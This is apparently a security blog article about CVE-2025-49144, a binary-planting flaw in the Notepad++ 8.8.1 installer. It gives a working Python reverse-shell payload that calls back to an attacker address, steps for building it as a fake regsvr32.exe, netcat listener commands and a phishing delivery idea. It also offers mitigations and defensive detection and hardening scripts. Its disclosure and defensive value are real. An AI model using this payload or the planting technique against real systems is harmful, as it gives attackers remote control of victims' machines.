CVE-2025-49144: Notepad++ vulnerability allows full system compromise
Notepad++ v8.8.1 was found to contain a serious vulnerability (CVE-2025-49144) that lets an attacker obtain system privileges by controlling where regsvr32.exe is found. The installer searches its current directory for dependencies without verifying where the file came from, which leads to malicious code execution. The vulnerability can be combined with phishing, which increases the risk. Recommended countermeasures include using absolute paths and verifying file signatures. 2025-6-30 07:46:46 Author: infosecwriteups.com

https://pixabay.com/illustrations/security-cyber-data-computer-4868172/

Disclaimer: The information provided in this article is for educational and informational purposes only. The intent behind discussing hacking techniques, tools, and concepts is not to encourage or endorse any illegal activity.

Yes, you heard that correctly. A critical vulnerability has been discovered in Notepad++ v8.8.1, which was released on 5 May 2025. It affects millions of users worldwide, because it can hand an attacker system-level access to their machines.

The vulnerability is tracked as CVE-2025-49144. It enables an attacker to gain system-level privileges by controlling where the installer finds an executable named regsvr32.exe.

In this article we will discuss the reason behind this vulnerability, how to exploit it, and what the possible consequences are.

Root Cause of the Vulnerability:

The vulnerability comes from an uncontrolled executable search path in the Notepad++ installer. When the installer runs, it looks for executable dependencies, one of which is regsvr32.exe, and it looks for that file in its current directory (the directory the installer was launched from) without any verification. On Windows, a process started by bare file name rather than by full path is resolved by searching the application's own directory and the current directory before the system directories, so a file with the right name sitting next to the installer wins over the genuine C:\Windows\System32\regsvr32.exe.

An attacker can therefore place a malicious executable named regsvr32.exe next to the installer, and the installer is tricked into running that file instead of the real one. This is a classic binary-planting attack.

This allows an attacker to execute arbitrary code, potentially leading to a reverse shell or full system compromise.

Let's first look at how the attack can be performed:

Step 1: Create the malicious payload and save it as regsvr32.py.

Note: Change the IP address (and the port, if required) to match your listener.

import socket
import os
import threading
import subprocess as sp

ip_addr = '<ATTACKER_IP_ADDRESS>'
port = 4444

# Start cmd.exe with its stdin and stdout wired to pipes (stderr merged into stdout)
p = sp.Popen(['cmd.exe'], stdin=sp.PIPE, stdout=sp.PIPE, stderr=sp.STDOUT)

# Create a socket and connect back to the listener on the attacker machine
s = socket.socket()
s.connect((ip_addr, port))

# Read from the subprocess stdout and send it to the socket
def read_and_send():
    while True:
        o = os.read(p.stdout.fileno(), 1024)
        if not o:  # cmd.exe has exited: stop instead of spinning on EOF
            break
        s.sendall(o)

# Receive from the socket and write it to the subprocess stdin
def recv_and_write():
    while True:
        i = s.recv(1024)
        if not i:  # listener closed the connection: tear down the shell
            p.terminate()
            break
        os.write(p.stdin.fileno(), i)

# Start the threads; the non-daemon writer thread keeps the process alive
threading.Thread(target=read_and_send, daemon=True).start()
threading.Thread(target=recv_and_write).start()

Step 2: Run the following command to convert the script into an executable. When it finishes, regsvr32.exe is created inside the dist folder.

python -m PyInstaller --onefile regsvr32.py

Note: Make sure regsvr32.exe and the Notepad++ installer are in the same directory.

Installer and Malicious files are in the same directory

Step 3: Set up a listener with netcat on your attacker machine, using the same port you put in the malicious file.

Note: netcat must be installed for this command to work.

For Linux:

nc -nvlp <PORT_NUMBER>

Setup Listener on attacker machine

For Windows:

ncat -nvlp <PORT_NUMBER>

Step 4: Run the Notepad++ installer, npp.8.8.1.Installer.x64.exe.

Continue the installation normally. At the last step, while the installer is extracting its files, the planted regsvr32.exe is executed and you receive a connection on your attacker machine.

In Process Monitor we can clearly see that the installer is looking for regsvr32.exe in the Downloads directory.

Note: Although the operation is shown as CreateFile, that does not always mean a file is being created; CreateFile is also the call that opens an existing file.

Installer is searching for regsvr32.exe in Downloads directory
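The Process Monitor observation above can be turned into a check over an exported capture. The following Python script is an added example, not code from the original article: it assumes ProcMon's default CSV export columns (Time of Day, Process Name, PID, Operation, Path, Result, Detail) and flags any lookup, image load or process launch of a system binary such as regsvr32.exe whose path lies outside the Windows system directories. A CreateFile that ends in NAME NOT FOUND is reported too, as a probe, because it shows the process searching an untrusted directory even before anything is planted there. The sample rows are constructed to mirror the scenario in this article; the binary names beyond regsvr32.exe and the trusted-directory list are my assumptions.

```python
import csv
import io
import ntpath

# System binaries an installer should resolve only from the Windows system
# directories. regsvr32.exe is the one from this advisory; the others are
# assumed extras of the same kind.
SYSTEM_BINARIES = {"regsvr32.exe", "rundll32.exe", "cmd.exe", "powershell.exe"}

# Where those binaries legitimately live (assumed standard install location).
TRUSTED_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")

# ProcMon operations that reveal a binary being looked up, mapped or launched.
INTERESTING_OPS = {"CreateFile", "Process Create", "Load Image"}


def in_trusted_dir(path):
    """True if the file's directory is one of the trusted system directories."""
    directory = ntpath.dirname(path).lower()
    return any(directory == d or directory.startswith(d + "\\") for d in TRUSTED_DIRS)


def find_planting_candidates(procmon_csv):
    """Scan a ProcMon CSV export and return the suspicious rows.

    A row is reported when the operation is one of INTERESTING_OPS, the file
    name is a system binary, and the directory is not a trusted one. A
    CreateFile that ended in NAME NOT FOUND is reported as a "probe": the
    process searched an untrusted directory, which is the uncontrolled
    search path itself. Anything else is a "hit".
    """
    findings = []
    for row in csv.DictReader(io.StringIO(procmon_csv)):
        op = row["Operation"]
        path = row["Path"]
        if op not in INTERESTING_OPS:
            continue
        if ntpath.basename(path).lower() not in SYSTEM_BINARIES:
            continue
        if in_trusted_dir(path):
            continue
        findings.append({
            "process": row["Process Name"],
            "operation": op,
            "path": path,
            "kind": "probe" if row["Result"] == "NAME NOT FOUND" else "hit",
        })
    return findings


# Constructed sample rows (not a real capture), shaped like ProcMon's default
# CSV export and mirroring the scenario described in the article.
SAMPLE_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"4:15:22.1234567 PM","npp.8.8.1.Installer.x64.exe","5120","CreateFile","C:\Users\victim\Downloads\rundll32.exe","NAME NOT FOUND","Desired Access: Read Attributes"
"4:15:22.1300000 PM","npp.8.8.1.Installer.x64.exe","5120","CreateFile","C:\Users\victim\Downloads\regsvr32.exe","SUCCESS","Desired Access: Read Attributes"
"4:15:22.1400000 PM","npp.8.8.1.Installer.x64.exe","5120","Process Create","C:\Users\victim\Downloads\regsvr32.exe","SUCCESS","PID: 6012, Command line: regsvr32.exe"
"4:15:22.1500000 PM","npp.8.8.1.Installer.x64.exe","5120","CreateFile","C:\Windows\System32\regsvr32.exe","SUCCESS","Desired Access: Read Attributes"
"4:15:22.1600000 PM","npp.8.8.1.Installer.x64.exe","5120","RegOpenKey","HKLM\SOFTWARE\Notepad++","SUCCESS","Desired Access: Read"
"4:15:23.0000000 PM","explorer.exe","1234","CreateFile","C:\Users\victim\Downloads\npp.8.8.1.Installer.x64.exe","SUCCESS","Desired Access: Read Data"
'''


def analyze_sample():
    """Run the scan over the constructed sample and return its findings."""
    return find_planting_candidates(SAMPLE_CSV)


if __name__ == "__main__":
    for finding in analyze_sample():
        print(f'{finding["kind"]:5}  {finding["process"]}  {finding["operation"]}  {finding["path"]}')
```

On a real capture, export from ProcMon with File > Save as CSV and pass the file contents to find_planting_candidates; filtering the capture to the installer's process first keeps the output short.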

In the image below you can see that, after the malicious file ran, a reverse shell was established, giving command-line access to the victim machine.

Reverse shell established after executing the malicious regsvr32.exe

Security Implications

This vulnerability can be exploited in combination with a phishing attack, in which the attacker tricks the victim into downloading a zip file containing both the installer and the malicious file. When the victim runs the installer, its uncontrolled search path causes the malicious file to be executed, which gives the attacker arbitrary code execution and potentially a reverse shell, that is, full control over the victim machine. Combining phishing with this vulnerability significantly increases the risk of the attack.

Possible Measures

  1. Use absolute paths: Instead of relying on the current working directory, the installer should launch executable dependencies by absolute path, e.g. C:\Windows\System32\regsvr32.exe.
  2. Verify integrity: The installer should verify the digital signature of a file before executing it, to confirm that it has not been tampered with or replaced.
  3. Avoid untrusted paths: Never load dependencies from untrusted directories, in particular from user-writable ones such as Downloads.
  4. For users, until an installer applies these measures: run installers from a freshly created, empty folder rather than from Downloads, and check that no file named regsvr32.exe sits next to the installer before launching it.
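To make the first measure concrete, the following Python script is an added example, not code from Notepad++ or from the original article. In a temporary directory it emulates the search order Windows applies to a bare executable name (application directory, then current directory, then System32, then PATH) and contrasts it with resolving an absolute path under System32 pinned to a known-good SHA-256. The hash pin is a stand-in for the Authenticode signature check the second measure calls for, which needs Windows APIs and is not shown here. It also includes the pre-install check a user can run against the installer's folder. The directory layout and file contents are constructed.

```python
import hashlib
import tempfile
from pathlib import Path


# Emulation of the search order Windows applies when a process is started by
# bare name: the application's directory, the current directory, the system
# directory, then PATH. The directories passed in stand in for the real ones.
def resolve_like_createprocess(name, app_dir, cwd, system32, path_dirs=()):
    for directory in (app_dir, cwd, system32, *path_dirs):
        candidate = Path(directory) / name
        if candidate.is_file():
            return candidate
    return None


def sha256_of(path):
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()


# Hardened form: no search at all. The binary is taken from the system
# directory only and, when a pin is given, rejected unless its SHA-256 matches
# the known-good value (stand-in for a signature check).
def resolve_absolute(name, system32, expected_sha256=None):
    candidate = Path(system32) / name
    if not candidate.is_file():
        return None
    if expected_sha256 is not None and sha256_of(candidate) != expected_sha256:
        return None
    return candidate


# Pre-install check for users: list files next to the installer that share a
# name with a system binary. Windows file names are case-insensitive, so the
# comparison ignores case.
def planted_system_binaries(installer_dir, names=("regsvr32.exe",)):
    wanted = {n.lower() for n in names}
    return sorted(p.name for p in Path(installer_dir).iterdir()
                  if p.is_file() and p.name.lower() in wanted)


def demo():
    """Build a constructed layout mirroring the article's scenario and report what each resolver picks."""
    with tempfile.TemporaryDirectory() as root:
        root = Path(root)
        system32 = root / "Windows" / "System32"
        downloads = root / "Users" / "victim" / "Downloads"
        system32.mkdir(parents=True)
        downloads.mkdir(parents=True)

        # Constructed stand-ins: the genuine binary, the installer, the planted file.
        (system32 / "regsvr32.exe").write_bytes(b"genuine regsvr32")
        (downloads / "npp.8.8.1.Installer.x64.exe").write_bytes(b"installer")
        (downloads / "regsvr32.exe").write_bytes(b"planted payload")
        good_hash = sha256_of(system32 / "regsvr32.exe")

        # The installer was launched from Downloads, so both the application
        # directory and the current directory are Downloads.
        unsafe = resolve_like_createprocess("regsvr32.exe", downloads, downloads, system32)
        safe = resolve_absolute("regsvr32.exe", system32, good_hash)

        # Tamper with the system copy: the pinned hash now rejects it.
        (system32 / "regsvr32.exe").write_bytes(b"replaced")
        tampered = resolve_absolute("regsvr32.exe", system32, good_hash)

        return {
            "unsafe_picked_planted": unsafe == downloads / "regsvr32.exe",
            "safe_picked_real": safe == system32 / "regsvr32.exe",
            "tampered_rejected": tampered is None,
            "planted_next_to_installer": planted_system_binaries(downloads),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The unsafe resolver returns the planted file as soon as it exists in the first searched directory; the hardened one never looks there, and the pin turns a replaced system copy into a hard failure rather than a silent execution.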

Thanks for reading


Source: https://infosecwriteups.com/cve-2025-49144-notepad-vulnerability-allows-full-system-compromise-17944dc3fc2b?source=rss----7b722bfd1b8d--bug_bounty